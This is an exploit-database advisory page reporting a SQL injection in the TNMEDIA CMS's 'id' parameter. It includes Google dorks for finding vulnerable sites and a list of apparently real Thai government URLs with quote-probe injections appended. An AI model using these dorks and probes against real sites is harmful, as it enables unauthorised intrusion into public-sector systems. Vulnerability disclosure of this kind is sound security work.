TNMEDIA SQL Injection Vulnerability

2015.03.20
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:/index.php?pages=personal id= intext:Powered by TNMEDIA

######################################### Exploit Title : TNMEDIA Sql Injection Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: http://www.tnmediasystem.com/index.php Google Dork 1 : Powered by TNMEDIA Google Dork 2 : inurl:/index.php?pages=personal id= intext:Powered by TNMEDIA Date : 19 / 3 / 2015 Tested On : windows se7en + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~~ ~~ ~ ~~> Location <~ ~ ~ WEBSITE/index.php?pages=personal&id=[SQL] ~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> DEMO <~ ~ ~ http://charoenmuanXg.go.th/index.php?pages=personal&id=6' http://www.rimkokX.go.th/index.php?pages=personal&id=4' http://www.sanmXaka.go.th/index.php?pages=personal&id=5' http://www.maeXjd.go.th/index.php?pages=personal&id=12' http://www.pongphrXae.go.th/index.php?pages=personal&id=7' http://www.muangXphanlocal.go.th/index.php?pages=personal&id=5' http://www.paoorXdonchai.go.th/index.php?pages=personal&id=8' And Google More . . . ######################################### ######################################### Discovered by : SeRaVo.BlackHat [*] H.4.S.S.4.N [*] ######################################### #########################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top